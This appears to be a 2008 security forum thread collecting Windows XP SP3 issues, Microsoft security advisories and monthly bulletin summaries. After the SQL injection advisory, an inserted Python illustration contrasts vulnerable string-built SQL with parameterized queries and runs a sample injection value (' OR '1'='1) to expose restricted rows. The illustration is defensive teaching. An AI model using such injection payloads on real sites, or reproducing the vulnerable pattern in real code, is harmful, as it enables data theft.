:fear:

AplusWebMaster
2008-05-20, 15:10
HP - AMD - XPSP3...

XP SP3 Upgrade Utility for systems with AMD processors
- http://preview.tinyurl.com/4g2b6y
Release Date: 2008-05-14 - Version: 1.0 (HP Customer Care)
Description: Microsoft Windows XP SP3 Upgrade Utility prevents continuous system restarts or "Stop: 0x0000007E" errors after upgrading to Windows XP SP3 on systems with AMD processors.
Fixes: Prevents a condition from occurring that causes continuous system restarts or "Stop: 0x0000007E" errors after upgrading to Microsoft Windows XP Service Pack 3 on systems with an AMD processor.
Example: "A problem has been detected and Windows has been shut down to prevent damage to your computer..."

Download: sp37394.exe (1.85M)

.

AplusWebMaster
2008-05-21, 16:35
FYI...

XPSP3 chokes on ISP versions of IE7
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=207801330
May 20, 2008 - "Private label versions of Microsoft's Internet Explorer 7 browser, including those provided to customers by Internet Service Providers Comcast and Qwest, are prone to crash during installation on computers running Windows XP SP3 because they tend to be outdated, Microsoft is warning. The problem generally occurs when a so-called "branded" version of IE7 is installed for the first time on a computer that's running XP SP3, said Microsoft program manager Jane Maliouta, in a blog post*. "The reason is that the IE7 package you are trying to install uses old IE7 files," said Maliouta. The trouble? Some ISPs are still distributing versions of IE7 that don't contain updates designed to make the browser compatible with Windows XP SP3. Specifically, XP SP3 runs a version of an essential dynamic-link library file called XMLLite.dll that's not compatible with versions of IE7 released prior to October..."
* http://preview.tinyurl.com/6rwwf8
May 12, 2008 (blogs.msdn.com)

:fear:

AplusWebMaster
2008-05-22, 14:55
FYI...

XP SP3 triggers false positives in security apps
- http://windowssecrets.com/comp/080522#story1
2008-05-22 - "Installing Windows XP Service Pack 3 can cause your anti-malware programs to report the presence of Trojans and keyloggers that aren't there. The false positives have blocked important system files in some cases, and in others they have misled users into reinstalling XP... Comments on a PC Tools forum* confirm customer reports that the company's Spyware Doctor program generates a false positive on systems with Windows XP SP3. Similarly, at least one site claims that Symantec's Norton Internet Security software identifies a common system file as a keylogger. ReviewSaurus reports** that XP SP3 causes Norton Internet Security to identify ctfmon.exe as a keylogger (a kind of malware that records your keystrokes to capture passwords and other important data). In reality, the ctfmon.exe file in your Windows\System32 folder is a Microsoft system file that enables alternative input methods such as speech, tablet, or on-screen keyboard. A spokesperson for Symantec was not immediately available for comment..."

* http://www.pctools.com/forum/showthread.php?t=51766&page=3

** http://www.reviewsaurus.com/tips-tricks/windows-xp-sp3-service-pack-3-install-problems/

.

AplusWebMaster
2008-05-29, 17:20
FYI...

- http://windowssecrets.com/comp/080529#patch0
2008-05-29 - "Antivirus software from Symantec Corp. may cause the installation of Service Pack 3 for XP to corrupt the Windows Registry by adding unnecessary keys.
Symantec advises users to disable the SymProtect security feature of its products before applying XP SP3.
A Registry fix is needed by the latest XP patch..."

(More detail at the URL above.)

:fear:

AplusWebMaster
2008-05-31, 09:00
FYI...

Microsoft Security Advisory (953818)
Blended Threat from Combined Attack Using Apple’s Safari on the Windows Platform
- http://www.microsoft.com/technet/security/advisory/953818.mspx
Published: May 30, 2008 - "Microsoft is investigating new public reports of a blended threat that allows remote code execution on all supported versions of Windows XP and Windows Vista when Apple’s Safari for Windows has been installed. Safari is not installed with Windows XP or Windows Vista by default; it must be installed independently or through the Apple Software Update application. Customers running Safari on Windows should review this advisory.
At the present time, Microsoft is unaware of any attacks attempting to exploit this blended threat. Upon completion of this investigation, Microsoft will take the appropriate measures to protect our customers. This may include providing a solution through a service pack, the monthly update process, or an out-of-cycle security update, depending on customers' needs.
Mitigating Factors:
• Customers who have changed the default location where Safari downloads content to the local drive are -not- affected by this blended threat."
- http://blogs.technet.com/msrc/archive/2008/05/30/security-advisory-953818-posted.aspx
May 30, 2008

- http://secunia.com/advisories/30467/
Release Date: 2008-06-02
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched
OS: Microsoft Windows Vista, Microsoft Windows XP Home Edition, Microsoft Windows XP Professional
Software: Safari for Windows 3.x
...The vulnerability is reported in Safari running on Windows XP or Vista.
Solution: Set the download location in Safari to a location other than "Desktop"...
Original Advisory: http://www.microsoft.com/technet/security/advisory/953818.mspx

AplusWebMaster
2008-06-02, 23:18
FYI...

XPSP3 replaced the up-to-date flash.ocx...
- http://isc.sans.org/diary.html?storyid=4513
Last Updated: 2008-06-02 19:18:05 UTC - "It appears that XPSP3 installs an older vulnerable version of the flash player...
http://www.microsoft.com/technet/security/Bulletin/MS06-069.mspx
Why was this Bulletin revised on May 13, 2008?
This bulletin was revised to add Windows XP Service Pack 3 as affected software..."
> Latest v9,0,124,0 - http://www.adobe.com/go/getflashplayer

Other references noting the problem:

- http://preview.tinyurl.com/5cz4wt
June 01, 2008 9:38 PM (Donna's SecurityFlash)

Ref: http://www.dozleng.com/updates/index.php?showtopic=18354&st=0&p=80908&#entry80908

:spider::oops::rolleyes:

AplusWebMaster
2008-06-06, 13:20
FYI...

PCpitstop XPSP3 review:
- http://preview.tinyurl.com/4y7zqc
May 25, 2008 - Windows XP SP3 Issues and Fixes Continued


:sad:

AplusWebMaster
2008-06-06, 14:50
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-jun.mspx
June 5, 2008 - "...This is an advance notification of security bulletins that Microsoft is intending to release on June 10, 2008..."
(Total of -7-)

Critical (3)

Bulletin Identifier: Bluetooth Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Bulletin Identifier: Internet Explorer Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer...

Bulletin Identifier: DirectX Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Important (3)

Bulletin Identifier: WINS Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Windows...

Bulletin Identifier: Active Directory Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Denial of Service...
Affected Software: Microsoft Windows...

Bulletin Identifier: PGM Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Denial of Service...
Affected Software: Microsoft Windows...

Moderate (1)

Bulletin Identifier: Kill Bit Bulletin
Maximum Severity Rating: Moderate
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...


This advance notification provides the software subject as the bulletin identifier, because the official Microsoft Security Bulletin numbers are not issued until release...

AplusWebMaster
2008-06-08, 13:13
FYI...

Microsoft Security Advisory (953818)
Blended Threat from Combined Attack Using Apple’s Safari on the Windows Platform
- http://www.microsoft.com/technet/security/advisory/953818.mspx
Revisions:
• May 30, 2008: Advisory published.
• June 6, 2008: Modified the steps in the workaround and added acknowledgment.

:fear:

AplusWebMaster
2008-06-10, 20:59
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-jun.mspx
June 10, 2008 - "This bulletin summary lists security bulletins released for June 2008...

Critical (3)

Microsoft Security Bulletin MS08-030
Vulnerability in Bluetooth Stack Could Allow Remote Code Execution (951376)
- http://www.microsoft.com/technet/security/bulletin/ms08-030.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-031
Cumulative Security Update for Internet Explorer (950759)
- http://www.microsoft.com/technet/security/bulletin/ms08-031.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer...

Microsoft Security Bulletin MS08-033
Vulnerabilities in DirectX Could Allow Remote Code Execution (951698)
- http://www.microsoft.com/technet/security/bulletin/ms08-033.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Important (3)

Microsoft Security Bulletin MS08-034
Vulnerability in WINS Could Allow Elevation of Privilege (948745)
- http://www.microsoft.com/technet/security/bulletin/ms08-034.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-035
Vulnerability in Active Directory Could Allow Denial of Service (953235)
- http://www.microsoft.com/technet/security/bulletin/ms08-035.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Denial of Service...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-036
Vulnerabilities in Pragmatic General Multicast (PGM) Could Allow Denial of Service (950762)
- http://www.microsoft.com/technet/security/bulletin/ms08-036.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Denial of Service...
Affected Software: Microsoft Windows...

Moderate (1)

Microsoft Security Bulletin MS08-032
Cumulative Security Update of ActiveX Kill Bits (950760)
- http://www.microsoft.com/technet/security/bulletin/ms08-032.mspx
Maximum Severity Rating: Moderate
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...


• New, Revised, and Released Updates for Microsoft Products Other Than Microsoft Windows.
- http://technet.microsoft.com/en-us/wsus/bb466214.aspx

-------

ISC Analysis
- http://isc.sans.org/diary.html?storyid=4552
Last Updated: 2008-06-10 18:09:18 UTC

MS08-031 - MSIE - Details on attacking CVE-2008-1544 are publicly available

MS08-032 - ActiveX Kill Bits - Publicly discussed

------
Geez...

- http://www.microsoft.com/technet/security/bulletin/ms08-jun.mspx
Revisions
• V1.0 (June 10, 2008): Bulletin summary published.
• V1.1 (June 11, 2008): Corrected the Affected Software table for Windows XP, to clarify the entries for Windows XP Service Pack 2 and Windows XP Service Pack 3 for MS08-030, MS08-031, MS08-032, MS08-033, and MS08-036.

:fear:

patflgn
2008-06-12, 20:51
Windows XP SP3 is crashing BiPAC 5200 series modem/routers. The problem lies with the routers, however, and there is a patch available.

It does not appear that these routers are sold in the US, though.

http://www.billion.com/notice-200805.html

AplusWebMaster
2008-06-16, 15:21
FYI...

Microsoft Security Advisory (954474)
System Center Configuration Manager 2007 Blocked from Deploying Security Updates
- http://www.microsoft.com/technet/security/advisory/954474.mspx
June 13, 2008 - "Microsoft is investigating public reports of a non-security issue that affects environments with System Center Configuration Manager 2007 that deploy updates to Systems Management Services (SMS) 2003 clients. Microsoft is aware of reports from customers who are experiencing this issue. Upon completion of the investigation, Microsoft will take the appropriate action to resolve the problem within System Center Configuration Manager 2007.
Mitigating Factors:
• This issue impacts customers using System Center Configuration Manager 2007 servers to deploy updates to SMS 2003 clients..."

:fear:

AplusWebMaster
2008-06-18, 14:01
FYI...

Microsoft Security Advisory (954474)
System Center Configuration Manager 2007 Blocked from Deploying Security Updates
- http://www.microsoft.com/technet/security/advisory/954474.mspx
Updated: June 17, 2008 - "... Microsoft has confirmed those reports and has released an update to correct this issue under Microsoft Knowledge Base Article 954474*. Microsoft encourages customers affected by this issue to review and install this update..."
* http://support.microsoft.com/kb/954474
Last Review: June 17, 2008
Revision: 2.1

AplusWebMaster
2008-06-20, 13:22
FYI...

MS08-030 - new patch, for XPSP2 & XPSP3
- http://isc.sans.org/diary.html?storyid=4600
Last Updated: 2008-06-20 01:20:41 UTC - "Microsoft issued a new patch, for XPSP2 & XPSP3, for MS08-030*: Vulnerability in Bluetooth stack could allow remote code execution. "Customers who are running Windows XP Service Pack 2 and Windows XP Service Pack 3 should download and deploy this new security update. Customers running Windows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2 and all supported versions of Windows Vista who have already applied these original security updates do not need to take any further action"... The Technet Security Vulnerability Research & Defense blog** on the vulnerability was "MS08-030: All bark and no bite? The case of the Bluetooth update".
Related update - KB951376 Security Update for Windows XP:
http://support.microsoft.com/kb/951376/en-us ..."
Last Review: June 19, 2008
Revision: 2.0

* http://www.microsoft.com/technet/security/bulletin/ms08-030.mspx
Revisions:
• V1.0 (June 10, 2008): Bulletin published.
• V2.0 (June 19, 2008): Added "Why was this security update reoffered on June 19, 2008?" entry to the Update FAQ to advise customers running Windows XP Service Pack 2 and Windows XP Service Pack 3 that a revised version of the security update is available.
"...Customers who are running Windows XP Service Pack 2 and Windows XP Service Pack 3 should download and deploy this new security update..."

** http://preview.tinyurl.com/67t4uw
(blogs.technet.com)

:fear:

AplusWebMaster
2008-06-23, 20:55
FYI...

- http://preview.tinyurl.com/4nhmfr
June 20, 2008 (blogs.technet.com) - "...After its first -day- in MSRT, Taterf components had been removed from over 700,000 machines! For comparison, Win32/Nuwar (aka ‘Storm worm’) was removed from less than half that in its first month... So how does one avoid being infected? Running an up-to-date anti-virus solution is a good start. Running an up-to-date, patched browser is another necessity – many of the Win32/Frethog trojans are installed via browser exploits (there have been instances in the past of links to malicious sites being posted to popular gaming forums – so be wary!). Enabling Automatic Updates helps a whole bunch too. Disabling the Explorer ‘autoplay’ feature is useful in helping to avoid these problems..."

(Charts of disinfections/country available at the URL above.)

:D:

AplusWebMaster
2008-06-25, 14:59
FYI...

Microsoft Security Advisory (954462)
Rise in SQL Injection Attacks Exploiting Unverified User Data Input
- http://www.microsoft.com/technet/security/advisory/954462.mspx
June 24, 2008 - "Microsoft is aware of a recent escalation in a class of attacks targeting Web sites that use Microsoft ASP and ASP.NET technologies but do not follow best practices for secure Web application development. These SQL injection attacks do not exploit a specific software vulnerability, but instead target Web sites that do not follow secure coding practices for accessing and manipulating data stored in a relational database. When a SQL injection attack succeeds, an attacker can compromise data stored in these databases and possibly execute remote code. Clients browsing to a compromised server could be forwarded unknowingly to malicious sites that may install malware on the client machine.
Mitigating Factors:
This vulnerability is not exploitable in Web applications that follow generally accepted best practices for secure Web application development by verifying user data input...
(See) Suggested Actions..."
• Detection – HP Scrawlr - http://preview.tinyurl.com/4qkk6g ...
• Defense – UrlScan - http://learn.iis.net/page.aspx/473/using-urlscan
• Identifying - Source Code Analyzer for SQL Injection - http://support.microsoft.com/kb/954476
• Additional Info...

Microsoft SQL Injection Prevention Strategy
- http://isc.sans.org/diary.html?storyid=4621
Last Updated: 2008-06-24 22:17:41 UTC - "...Microsoft recommends three approaches to help mitigate SQL Injection.
• Runtime scanning...
• URLScan...
• Code Scanning..."

- http://atlas.arbor.net/briefs/index#361782669
June 25, 2008 - "Microsoft today released security tools to help customers deal with SQL Injection Attacks. UrlScan, Microsoft Source Code Analyzer for SQL Injection and Scrawlr can be used by customers to check for SQL Injection issues in their applications.
Analysis: The release of these tools comes in a time when SQL injection is increasingly exploited. UrlScan is used to restrict HTTP requests that IIS will process."
* http://preview.tinyurl.com/5t2sbh
(blogs.technet.com)

:fear:
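The advisory above says the attacks need no product bug, only a site that concatenates unverified request data into its SQL. As an added illustration (not code from Microsoft or from any of the linked pages, and using Python with SQLite in place of the ASP/ASP.NET sites the advisory concerns), this contrasts that concatenation pattern with a parameterized query and the input verification the advisory recommends; the table, rows and hostile value are constructed for the example.

```python
import re
import sqlite3

# Constructed sample catalogue standing in for a site's relational database.
SAMPLE_PRODUCTS = [
    ("Widget", "tools"),
    ("Sprocket", "tools"),
    ("Gasket", "parts"),
    ("Internal price list", "restricted"),
]

# Constructed allowlist shape for a category value: letters only, bounded length.
CATEGORY_RE = re.compile(r"^[A-Za-z]{1,32}$")


def make_db():
    """Build an in-memory SQLite table from the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, category TEXT)"
    )
    conn.executemany(
        "INSERT INTO products (name, category) VALUES (?, ?)", SAMPLE_PRODUCTS
    )
    conn.commit()
    return conn


def search_unverified(conn, category):
    """The pattern the advisory warns about: request data is pasted straight
    into the statement text, so the value can change the query's logic."""
    sql = (
        "SELECT name FROM products WHERE category = '" + category + "' ORDER BY id"
    )
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn, category):
    """Hardened form: the value is bound as a parameter and is never parsed
    as SQL, whatever characters it contains."""
    sql = "SELECT name FROM products WHERE category = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (category,))]


def is_valid_category(category):
    """Input verification (the advisory's 'verifying user data input'):
    accept only values of the expected shape and reject everything else."""
    return bool(CATEGORY_RE.match(category))


def search_verified(conn, category):
    """Defence in depth: allowlist validation in front of the parameterized query."""
    if not is_valid_category(category):
        raise ValueError("rejected category value: %r" % category)
    return search_parameterized(conn, category)


if __name__ == "__main__":
    db = make_db()
    # Constructed hostile value: closes the quoted literal and appends a tautology,
    # which makes the concatenated query match every row, including restricted ones.
    hostile = "' OR '1'='1"
    print("unverified:    ", search_unverified(db, hostile))
    print("parameterized: ", search_parameterized(db, hostile))
    print("passes check:  ", is_valid_category(hostile))
```

Run as a script it prints all four names for the concatenated query, an empty list for the parameterized one, and False for the allowlist check; the same difference holds for any other quote-breaking input, not just the one shown.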

AplusWebMaster
2008-06-26, 13:24
FYI...

A reliability and performance update is available for Windows Vista SP1-based computers
- http://support.microsoft.com/kb/952709
Last Review: June 24, 2008
Revision: 1.0
"...This update includes the following improvements on a Windows Vista SP1-based computer:
• This update improves the stability of Windows Vista SP1-based computers by addressing some crashes that may occur when you try to check e-mail by using a POP3 e-mail client such as Windows Mail or Mozilla Thunderbird. The crashes may occur on a Windows Vista SP1-based computer in the following scenario:
• Incoming POP3 and outgoing SMTP traffic monitoring is enabled.
• Both a third-party antivirus application and an antispyware application are installed, such as the following applications:
• ZoneAlarm Internet Security Suite by Check Point Software Technologies Ltd.
• SpySweeper by Webroot Software, Inc.
• This update improves the reliability of Windows Vista SP1-based computers by addressing some problems that occur when you delete user accounts by using the User Accounts item in Control Panel. When this problem occurs, the system may stop responding (hang).
• This update improves the reliability of Windows Vista SP1-based computers that experience issues in which large applications cannot run after the computer is turned on for extended periods of time. For example, when you try to start Excel 2007 after the computer is turned on for extended periods of time, a user may receive an error message that resembles the following:
EXCEL.EXE is not a valid Win32 application
• This update improves the reliability of Windows Vista SP1-based computers by reducing the number of crashes that may be caused by the Apple QuickTime thumbnail preview in Windows Live Photo Gallery.
• This update improves the performance of Windows Vista SP1-based computers by reducing audio and video (AV) stuttering. Such AV stuttering may occur when the audio or video component is streaming high definition content from a Windows Vista SP1-based computer that has an NVIDIA network adapter nForce driver version 67.5.4.0 that is installed to a Windows Media Center Extender device..."

:fear::spider:

AplusWebMaster
2008-06-29, 14:24
FYI...

Device Manager may not show any devices and Network Connections may not show any network connections after you install Windows XP Service Pack 3 (SP3)
- http://support.microsoft.com/?kbid=953979
Last Review: June 25, 2008
Revision: -4.2-
SYMPTOMS:
After you install Windows XP Service Pack 3 (SP3), Device Manager may not show any devices and Network Connections may not show any network connections.
This problem may occur when an antivirus application is running during the installation of Windows XP SP3.
CAUSE
This problem occurs when the Fixccs.exe process is called during the Windows XP SP3 installation. This process creates some intermediate registry subkeys, and it later deletes these subkeys. In some cases, some antivirus applications may not let the Fixccs.exe process delete these intermediate registry subkeys.
When this problem occurs, certain applications, such as Device Manager and Network Connections, may be unable to enumerate the device or the connection instances. These applications will report a blank status even though devices and connections still function as expected.
RESOLUTION
Hotfix information:
The following file is available for download from the Microsoft Download Center:
Download the Update for Windows XP (KB953979) package now:
- http://preview.tinyurl.com/3jgjap
File Name: WindowsXP-KB953979-x86-ENU.exe
Download Size: 64 KB...
Prerequisites:
To use this hotfix, you must have Windows XP Service Pack 3 installed on the computer...
Restart requirement:
To apply this hotfix, you must restart the computer in Safe Mode..."

Steps to take -before- you install Windows XP Service Pack 3
- http://support.microsoft.com/kb/950717/
Last Review: May 21, 2008 - Revision: 3.0 - "...Important
• If the configuration of your antivirus software prevents certain system files from being changed, the Windows XP SP3 installation may fail. Try temporarily disabling your antivirus software. To do this, right-click your antivirus program icon, and then click Disable. This icon typically appears in the lower right corner of the computer screen.
• If you disable your antivirus software before you install Windows XP SP3, make sure that you know the risks that are involved, and make sure that you enable the antivirus software after Windows XP SP3 is installed..."

:fear:

AplusWebMaster
2008-07-01, 13:52
FYI...

Microsoft Security Advisory (954960)
Microsoft Windows Server Update Services (WSUS) Blocked from Deploying Security Updates
- http://www.microsoft.com/technet/security/advisory/954960.mspx
June 30, 2008 - "Microsoft is investigating public reports of a non-security issue that prevents the distribution of any updates deployed through Microsoft Windows Server Update Services 3.0 or Microsoft Windows Server Update Services 3.0 Service Pack 1 to client systems that have Microsoft Office 2003 installed in their environment. Microsoft is aware of reports from customers who are experiencing this issue. Upon completing the investigation, Microsoft will take appropriate action to resolve the issue within Microsoft Windows Server Update Services 3.0 or Microsoft Windows Server Update Services 3.0 Service Pack 1.

Note: The issue affecting System Center Configuration Manager 2007 first described in Microsoft Security Advisory 954474, where System Center Configuration Manager 2007 systems were blocked from deploying security updates, is separate from the issue described in this advisory.
Mitigating Factors:
• This issue is limited to customers who deploy updates through Microsoft Windows Server Update Services 3.0 or Microsoft Windows Server Update Services 3.0 Service Pack 1, and have Microsoft Office 2003 installed in their environments..."

- http://preview.tinyurl.com/6xdp79
June 30, 2008 (MSRC blog)

:fear::spider:

AplusWebMaster
2008-07-04, 14:41
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-jul.mspx
July 3, 2008
This is an advance notification of security bulletins that Microsoft is intending to release on July 8, 2008...
[Total of 4]...

Important (4)

Bulletin Identifier: SQL Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Windows, Microsoft SQL Server...

Bulletin Identifier: Windows Bulletin 1
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Bulletin Identifier: Windows Bulletin 2
Maximum Severity Rating: Important
Impact of Vulnerability: Spoofing...
Affected Software: Microsoft Windows...

Bulletin Identifier: Exchange Server Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Exchange Server...

- http://blogs.technet.com/msrc/archive/2008/07/03/july-2008-monthly-release.aspx
July 03, 2008

AplusWebMaster
2008-07-08, 00:15
FYI...

Microsoft Security Advisory (955179)
Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution
- http://www.microsoft.com/TechNet/security/advisory/955179.mspx
July 7, 2008 - "Microsoft is investigating active, targeted attacks leveraging a potential vulnerability in the ActiveX control for the Snapshot Viewer for Microsoft Access. An attacker could exploit the vulnerability by constructing a specially crafted Web page. When a user views the Web page, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. The ActiveX control for the Snapshot Viewer for Microsoft Access enables you to view an Access report snapshot without having the standard or run-time versions of Microsoft Office Access. The vulnerability only affects the ActiveX control for the Snapshot Viewer for Microsoft Office Access 2000, Microsoft Office Access 2002, and Microsoft Office Access 2003. The ActiveX control is shipped with all supported versions of Microsoft Office Access except for Microsoft Office Access 2007. The ActiveX control is also shipped with the standalone Snapshot Viewer...
Suggested Actions / Workarounds:
Microsoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, this is stated in the entry.
• Prevent COM objects from running in Internet Explorer
You can disable attempts to instantiate a COM object in Internet Explorer by setting the kill bit for the control in the registry..."

(Kill bit listings shown in the advisory at the URL above.)

:fear:

AplusWebMaster
2008-07-08, 22:00
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-jul.mspx
July 8, 2008 - "This bulletin summary lists security bulletins released for July 2008...

Important (4)

Microsoft Security Bulletin MS08-040
Vulnerabilities in Microsoft SQL Server Could Allow Elevation of Privilege (941203)
- http://www.microsoft.com/technet/security/bulletin/ms08-040.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Windows, Microsoft SQL Server...

Microsoft Security Bulletin MS08-038
Vulnerability in Windows Explorer Could Allow Remote Code Execution (950582)
- http://www.microsoft.com/technet/security/bulletin/ms08-038.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-037
Vulnerabilities in DNS Could Allow Spoofing (953230)
- http://www.microsoft.com/technet/security/bulletin/ms08-037.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Spoofing...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-039
Vulnerabilities in Outlook Web Access for Exchange Server Could Allow Elevation of Privilege (953747)
- http://www.microsoft.com/technet/security/bulletin/ms08-039.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Windows...

-
ISC Analysis
- http://isc.sans.org/diary.html?storyid=4684
Last Updated: 2008-07-08 18:22:23 UTC
---

MS08-038 exploit/fix available
- http://isc.sans.org/diary.html?storyid=4684
Last Updated: 2008-07-08 18:22:23 UTC
"...MS08-038 - Multiple vulnerabilities in Windows Explorer allow code execution with the rights of the logged on user... Publicly disclosed... CVE-2008-0951* is a well known vulnerability: CERT VU#889747** (March 2008)..."
- http://www.microsoft.com/technet/security/bulletin/ms08-038.mspx
July 8, 2008
* http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0951
Last revised: 3/25/2008
** http://www.kb.cert.org/vuls/id/889747
First Published 03/20/2008
---
Updated / CVE references:
- http://isc.sans.org/diary.html?storyid=4684
Last Updated: 2008-07-09 08:21:40 UTC ...(Version: 3)
MS08-037: Windows DNS
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1447
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1454
MS08-038: Windows explorer / Vista
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1435
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0951
MS08-039: Exchange server
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2247
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2248
MS08-040: SQL server
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0085
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0086
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0106
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0107

//

:fear:

AplusWebMaster
2008-07-09, 05:55
FYI... updated:

- http://isc.sans.org/diary.html?storyid=4684
Last Updated: 2008-07-09 08:21:40 UTC ...(Version: 3)
"...MS08-037 - Windows DNS ...ZoneAlarm users report* trouble with their firewall set to "high" for the Internet zone..."

Update - Important! - see: http://forums.spybot.info/showpost.php?p=211128&postcount=78 -prior- to MS08-037 install.

* http://support.microsoft.com/?kbid=951748
MS08-037 ...Windows XP... (client side)

//

AplusWebMaster
2008-07-09, 22:54
FYI...

- http://www.theinquirer.net/gb/inquirer/news/2008/07/09/windows-xp-sp3-automatic
9 July 2008 - "AS ANNOUNCED previously by Microsoft, automatic updates for Windows XP SP3 will be launched Wednesday, July 10 2008, starting at 10:00 am Pacific Time. For most Windows XP users who haven't already manually downloaded and applied SP3, the automatic update process should work properly. After all, Microsoft has had almost three months to test, tweak and polish it since it was first released. Microsoft's Automatic Updates process should know about and scan for configurations that are problematic, and prevent the Windows XP SP3 update installation process from proceeding if it detects a troublesome situation. However, if there's any hiccough in the automatic update process, your computer could become unusable. Therefore, certain technical advisors recommend using Microsoft's Automatic Updates facility only to provide notification that the update is available, then applying it manually. They caution that you should also take care to follow Microsoft's service pack pre-installation instructions, including:
* Disable antivirus programs,
* Make sure no other applications are running,
* Have your system plugged in during the update, that is, not on battery power, and
* Make sure that you have sufficient free space available on your system's hard disk.
You can make certain that the Windows Automatic Update facility doesn't attempt to, er... automatically update your system by using Microsoft's Windows Service Pack Blocker Tool Kit, and that's available here: http://preview.tinyurl.com/2tadkt
Should you find that Windows XP SP3 causes problems on your system, instructions on how to remove it are available here: http://www.iaps.com/blog/2008/07/how-to-remove-windows-xp-service-pack-3.html ..."

//

AplusWebMaster
2008-07-11, 05:51
FYI...

Update 2: Microsoft Security Advisory (954960)
- http://blogs.technet.com/msrc/archive/2008/07/10/update-2-microsoft-security-advisory-954960.aspx
July 10, 2008 - "...customers running Windows Server Update Services 3.0 Service Pack 1 on Windows Server 2008 may experience an issue installing the update provided in Microsoft Knowledge Base Article 954960*. The update does not correctly elevate privileges, which are required for the installation to complete. In order to successfully install this update we have identified steps in Advisory 954960**. Additionally, the update does not place an entry in Add or Remove Programs, and cannot be uninstalled. Microsoft has identified the packaging inconsistencies in the current update and is investigating options to resolve them. We will continue to monitor the situation and post updates to the advisory and the MSRC blog as we become aware of any important new information..."
* http://support.microsoft.com/kb/954960
Last Review: July 11, 2008 -?-
Revision: 3.0

** http://www.microsoft.com/technet/security/advisory/954960.mspx
• July 10, 2008: Advisory updated to reflect specific installation and uninstallation procedures for the update for Windows Server Update Services running on Windows Server 2008.

//

AplusWebMaster
2008-07-11, 05:54
FYI...

- http://blogs.technet.com/msrc/archive/2008/07/10/revision-for-ms08-037.aspx
July 10, 2008 (MSRC) - "...After the release of MS08-037, we became aware of reports of ZoneAlarm customers experiencing issues after applying the security updates. We started investigating these reports as soon as we heard about them and have been working to research this issue. We’re still working on this issue but we do have some information from our investigation so far, which we’ve put into the bulletin. Specifically, we’ve identified that customers who are running either ZoneAlarm or Check Point Endpoint Security (previously named Check Point Integrity) who apply MS08-037 may lose network connectivity after applying these updates. Our investigation so far has shown that no other customers are affected by this issue. We’re still investigating this issue but we encourage customers who are using ZoneAlarm to review the appropriate ZoneAlarm Web site** and Check Point Endpoint customers to review the appropriate Check Point Web site*** for the latest guidance or software updates and factor this information into your risk assessment, testing, and deployment planning..."

* http://www.microsoft.com/technet/security/Bulletin/MS08-037.mspx
• V2.0 (July 10, 2008): Bulletin revised to inform users of ZoneAlarm and Check Point Endpoint Security of an Internet connectivity issue detailed in the section, Frequently Asked Questions (FAQ) Related to this Security Update. The revision did -not- change the security update files in this bulletin, but users of ZoneAlarm and Check Point Endpoint Security should read the FAQ entries for guidance.

** http://download.zonealarm.com/bin/free/pressReleases/2008/LossOfInternetAccessIssue.html
Last Revised : 14 July 2008

*** https://supportcenter.checkpoint.com/supportcenter/index.jsp

//

